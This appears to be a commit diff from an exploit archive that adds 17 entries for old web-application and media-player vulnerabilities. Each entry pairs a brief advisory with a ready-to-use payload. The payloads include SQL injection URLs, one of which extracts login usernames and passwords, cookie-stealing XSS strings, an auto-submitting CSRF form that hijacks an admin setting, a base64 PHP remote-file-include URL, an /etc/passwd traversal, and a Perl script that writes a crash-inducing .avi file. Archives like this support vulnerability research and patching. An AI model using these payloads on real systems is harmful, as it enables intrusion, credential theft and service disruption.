DB: 2015-04-04

17 new exploits

files.csv

@@ -33028,3 +33028,20 @@ id,file,description,date,author,platform,type,port
 36617,platforms/php/webapps/36617.txt,"WordPress VideoWhisper Video Presentation 3.31.17 - Remote File Upload",2015-04-02,"Larry W. Cashdollar",php,webapps,80
 36618,platforms/php/webapps/36618.txt,"VideoWhisper Video Conference Integration 4.91.8 - Remote File Upload",2015-04-02,"Larry W. Cashdollar",php,webapps,80
 36619,platforms/linux/webapps/36619.txt,"Ericsson Drutt MSDP (Instance Monitor) - Directory Traversal",2015-04-02,"Anastasios Monachos",linux,webapps,0
+36620,platforms/php/webapps/36620.txt,"WordPress YouSayToo auto-publishing Plugin 1.0 'submit' Parameter Cross Site Scripting Vulnerability",2012-01-24,"H4ckCity Security Team",php,webapps,0
+36621,platforms/php/webapps/36621.txt,"glFusion 1.x SQL Injection",2012-01-24,KedAns-Dz,php,webapps,0
+36622,platforms/windows/dos/36622.pl,"UltraPlayer 2.112 Malformed '.avi' File Denial of Service Vulnerability",2012-01-24,KedAns-Dz,windows,dos,0
+36623,platforms/php/webapps/36623.txt,"Ultimate Locator 'radius' Parameter SQL Injection Vulnerability",2012-01-24,"Robert Cooper",php,webapps,0
+36624,platforms/php/webapps/36624.txt,"Joomla! 'com_jesubmit' Component 'index.php' Arbitrary File Upload Vulnerability",2012-01-24,"Robert Cooper",php,webapps,0
+36625,platforms/php/webapps/36625.txt,"OSClass 2.3.3 index.php sCategory Parameter SQL Injection",2012-01-25,"High-Tech Bridge SA",php,webapps,0
+36626,platforms/php/webapps/36626.txt,"OSClass 2.3.3 index.php getParam() Function Multiple Parameter XSS",2012-01-25,"High-Tech Bridge SA",php,webapps,0
+36627,platforms/php/webapps/36627.txt,"DClassifieds 0.1 final Cross Site Request Forgery Vulnerability",2012-01-25,"High-Tech Bridge SA",php,webapps,0
+36628,platforms/php/webapps/36628.txt,"vBadvanced CMPS 3.2.2 'vba_cmps_include_bottom.php' Remote File Include Vulnerability",2012-01-25,PacketiK,php,webapps,0
+36629,platforms/php/webapps/36629.txt,"Joomla! 'com_motor' Component 'cid' Parameter SQL Injection Vulnerability",2012-01-26,the_cyber_nuxbie,php,webapps,0
+36630,platforms/php/webapps/36630.txt,"Joomla 'com_products' Component Multiple SQL Injection Vulnerabilities",2012-01-26,the_cyber_nuxbie,php,webapps,0
+36631,platforms/php/webapps/36631.txt,"WordPress Slideshow Gallery Plugin 1.1.x 'border' Parameter Cross Site Scripting Vulnerability",2012-01-26,"Bret Hawk",php,webapps,0
+36632,platforms/php/webapps/36632.txt,"xClick Cart 1.0.x 'shopping_url' Parameter Cross Site Scripting Vulnerability",2012-01-26,sonyy,php,webapps,0
+36634,platforms/php/webapps/36634.txt,"Joomla! 'com_visa' Component Local File Include and SQL Injection Vulnerabilities",2012-01-28,the_cyber_nuxbie,php,webapps,0
+36635,platforms/php/webapps/36635.txt,"Joomla! 'com_firmy' Component 'Id' Parameter SQL Injection Vulnerability",2012-01-30,the_cyber_nuxbie,php,webapps,0
+36638,platforms/php/webapps/36638.txt,"Joomla! 'com_crhotels' Component 'catid' Parameter Remote SQL Injection Vulnerability",2012-01-31,the_cyber_nuxbie,php,webapps,0
+36639,platforms/php/webapps/36639.txt,"Joomla! 'com_propertylab' Component 'id' Parameter Remote SQL Injection Vulnerability",2012-01-30,the_cyber_nuxbie,php,webapps,0

platforms/php/webapps/36620.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51649/info
+
+YouSayToo auto-publishing for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+YouSayToo auto-publishing 1.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/[path]/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=[xss] 

platforms/php/webapps/36621.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/51650/info
+
+glFusion is prone to multiple SQL-injection vulnerabilities and an arbitrary-file-upload vulnerability because it fails to sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+glFusion 1.2.2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/[path]/profiles.php?sid=-1+UNION+SELECT+1,2,3,4,5,version(),NULL,6--
+http://www.example.com/[path]/article.php?story='1 AND 2=-1 UNION SELECT 1,2,3,4,5,version(),NULL,6-- 

platforms/php/webapps/36623.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/51653/info
+
+Ultimate Locator is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/locator/results_list.php?order=id&pageno=2&showsurrounding=1&zip=94102&zipsearch=Go&radius=-50 UNION ALL SELECT 1,2,3,4,5,6,7,group_concat(username,0x3a,password) FROM login-- 

platforms/php/webapps/36624.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/51657/info
+
+The 'com_jesubmit' component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
+
+http://www.example.com/index.php?option=com_jesubmit&view=jesubmit&Itemid=[id]&lang=en 

platforms/php/webapps/36625.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51662/info
+
+OSClass is prone to SQL-injection and cross-site scripting vulnerabilities.
+
+Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+OSClass 2.3.3 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/index.php?page=search&sCategory[]=0%27%20OR%20%28SELECT%20MID%28version%28%29,1,1% 29%29=5%29%20d%20--%202 

platforms/php/webapps/36626.txt

@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/51662/info
+ 
+OSClass is prone to SQL-injection and cross-site scripting vulnerabilities.
+ 
+Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+ 
+OSClass 2.3.3 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/index.php?page=search&sCity=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/scrip t%3E
+
+http://www.example.com/index.php?page=search&sPattern=%3C/title%3E%3Cscript%3Ealert%28document.cookie%29; %3C/script%3E
+
+http://www.example.com/index.php?page=search&sPriceMax=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/s cript%3E
+
+http://www.example.com/index.php?page=search&sPriceMin=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/s cript%3E 

platforms/php/webapps/36627.txt

@@ -0,0 +1,21 @@
+source: http://www.securityfocus.com/bid/51671/info
+
+DClassifieds is prone to a cross-site request-forgery vulnerability.
+
+Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected application. Other attacks are also possible.
+
+DClassifieds 0.1 final is vulnerable; other versions may also be affected. 
+
+<form action="http://www.example.com/admin/settings/update/id/4" method="post">
+<input type="hidden" name="Settings[setting_name]" value="CONTACT_EMAIL">
+<input type="hidden" name="Settings[setting_value]" value="hacker@mail.com">
+<input type="hidden" name="Settings[setting_description]" value="Contact email">
+
+<input type="hidden" name="Settings[setting_show_in_admin]" value="1">
+
+<input type="hidden" name="yt0" value="Save">
+<input type="submit" id="btn">
+</form>
+<script>
+document.getElementById('btn').click();
+</script>

platforms/php/webapps/36628.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/51672/info
+
+vBadvanced CMPS is prone to a remote file-include vulnerability because the application fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue may allow an attacker to execute arbitrary local and remote scripts in the context of the affected application or obtain potentially sensitive information. This may result in a compromise of the application and the underlying system; other attacks are also possible.
+
+vBadvanced CMPS 3.2.2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/vb/includes/vba_cmps_include_bottom.php?pages[pageid]=123&allowview=123&pages[type]=php_file&vba_cusmodid=123&pages[template]=data:;base64,PD9waHAgcGhwaW5mbygpO29iX2VuZF9mbHVzaCgpO2V4aXQ7Pz4=
+
+http://www.example.com/vb/includes/vba_cmps_include_bottom.php?pages[pageid]=123&allowview=123&pages[type]=php_file&vba_cusmodid=123&pages[template]=ftp://user:pass@127.0.0.1/123.txt 

platforms/php/webapps/36629.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/51673/info
+
+The 'com_motor' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+ http://www.example.com/index.php?option=com_motor&controller=motor&task=edit&cid[0]=[SQL Injection] 

platforms/php/webapps/36630.txt

@@ -0,0 +1,18 @@
+source: http://www.securityfocus.com/bid/51674/info
+
+The 'com_products' component for Joomla! is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?option=com_products&task=category&catid=[SQL Injection]
+http://www.example.com/index.php?option=com_products&id=[SQL Injection]
+http://www.example.com/index.php?option=com_products&catid=[SQL Injection]
+http://www.example.com/index.php?option=com_products&product_id=[SQL Injection]
+http://www.example.com/index.php?option=com_products&task=detail&parent_id=[SQL Injection]
+http://www.example.com/index.php?option=com_products&task=edit_productdetail&id_pro=[SQL Injection]
+http://www.example.com/index.php?option=com_products&Itemid=53&controller=home&task=displayitem&itemcode=[SQL Injection]
+http://www.example.com/index.php?option=com_products&catid=1&Cat[]=[SQL Injection]
+http://www.example.com/index.php?option=com_products&cid=[SQL Injection]
+http://www.example.com/index.php?option=com_products&view=products&id=19&cat=[SQL Injection]
+http://www.example.com/index.php?option=com_products&task=product&pid=[SQL Injection]
+http://www.example.com/index.php?option=com_products&Itemid=[SQL Injection] 

platforms/php/webapps/36631.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/51678/info
+
+Slideshow Gallery for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/wp-content/plugins/slideshow-gallery-2/css/gallery-css.php?1=1&resizeimages=Y&width=586&height=586&border='"--></style></script><script>Pwned by brethawk(0x000178)</script> 

platforms/php/webapps/36632.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51699/info
+
+xClick Cart is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+xClick Cart versions 1.0.1 and 1.0.2 are affected; other versions may also be vulnerable. 
+
+http://www.example.com/pages/cart/webscr.php?cmd=_cart&ew=1&item_name=Scrimshaw+Kit&item_number=SK1&amount=25.00&quantity=1&shipping=&tax=0&shopping_url=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E 

platforms/php/webapps/36634.txt

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/51726/info
+
+The 'com_visa' component for Joomla! is prone to a local file-include vulnerability and multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute arbitrary local files within the context of the affected application. Information harvested may aid in further attacks.
+
+The attacker can exploit the SQL-injection vulnerabilities to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass the authentication control. 
+
+http://www.example.com/index.php?option=com_visa&controller=../../../../../../../../../../../../../etc/passwd%00
+
+http://www.example.com/index.php?option=com_visa&view=book&id=23' + [SQL Injection]
+
+http:/www.example.com/index.php?option=com_visa&Itemid=35&page=4' + [SQL Injection] 

platforms/php/webapps/36635.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/51727/info
+
+The 'com_firmy' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+ http://www.example.com/index.php?option=com_firmy&task=section_show_set&Id=[SQLinjection] 

platforms/php/webapps/36638.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/51728/info
+
+The 'com_crhotels' component for Joomla! is prone to a remote SQL injection vulnerability.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/index.php?option=com_crhotels&view=cate&catid=[SQL Injection] 

platforms/php/webapps/36639.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/51729/info
+
+The 'com_propertylab' component for Joomla! is prone to a remote SQL injection vulnerability.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?option=com_propertylab&task=showproperty&id=[SQLinjection] 

platforms/windows/dos/36622.pl

@@ -0,0 +1,70 @@
+source: http://www.securityfocus.com/bid/51652/info
+
+UltraPlayer is prone to a denial-of-service vulnerability.
+
+Attackers can exploit this issue to crash the affected application, denying service to legitimate users.
+
+UltraPlayer 2.112 is vulnerable; other versions may also be affected. 
+
+#!/usr/bin/perl
+sub logo {
+print STDERR << "EOF";
+                                                                   
+1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
+0     _                   __           __       __                     1
+1   /' \            __  /'__`\        /\ \__  /'__`\                   0
+0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
+1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
+0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
+1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
+0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
+1                  \ \____/ >> Exploit database separated by exploit   0
+0                   \/___/          type (local, remote, DoS, etc.)    1
+1                                                                      1
+0  [+] Site            : 1337day.com                                   0
+1  [+] Support e-mail  : submit[at]1337day.com                         1
+0                                                                      0
+1               #########################################              1
+0               I'm KedAns-Dz member from Inj3ct0r Team                1
+1               #########################################              0
+0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
+
+EOF
+}
+####
+# Title : UltraPlayer v2.112 (.avi) Local Crash p0c Exploit
+# Author : KedAns-Dz
+# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com | kedans@facebook.com
+# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
+# Web Site : www.1337day.com
+# Facebook : http://facebook.com/KedAns 
+# platform : windows ( Dos/p0c )
+# Type : local exploit / p0c 4 Crash !!
+#####
+
+##
+# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |
+# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3   |
+# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h |
+# | KinG Of PiraTeS * The g0bl!n * soucha * dr.R!dE  .. |
+# | ------------------------------------------------- < |
+###
+
+logo();
+sleep(2);
+my $PoC = "\x4D\x41\x43\x20\x96\x0f\x00\x00\x34\x00\x00\x00\x18\x00\x00\x00";
+open (FILE,">> KedAns.avi"); # Bad File Here
+print FILE $PoC;
+close (FILE);
+
+# sP^tHanX & Gr33tZ t0 : Omar (www.l3b-r1z.com) | And My fr!ndS 0n HMD ^___^ <3 <3
+
+#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=====================================
+# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > || Rizky Ariestiyansyah * Islam Caddy 
+# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com) 
+# Inj3ct0r Members 31337 : Indoushka * KnocKout * Kalashinkov3 * SeeMe * ZoRLu * anT!-Tr0J4n
+# Anjel Injection (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * Sec4ever
+# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X
+# Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * KinG Of PiraTeS * www.packetstormsecurity.org * TreX
+# www.metasploit.com * UE-Team & I-BackTrack * r00tw0rm.com * All Security and Exploits Webs ..
+#=================================================================================================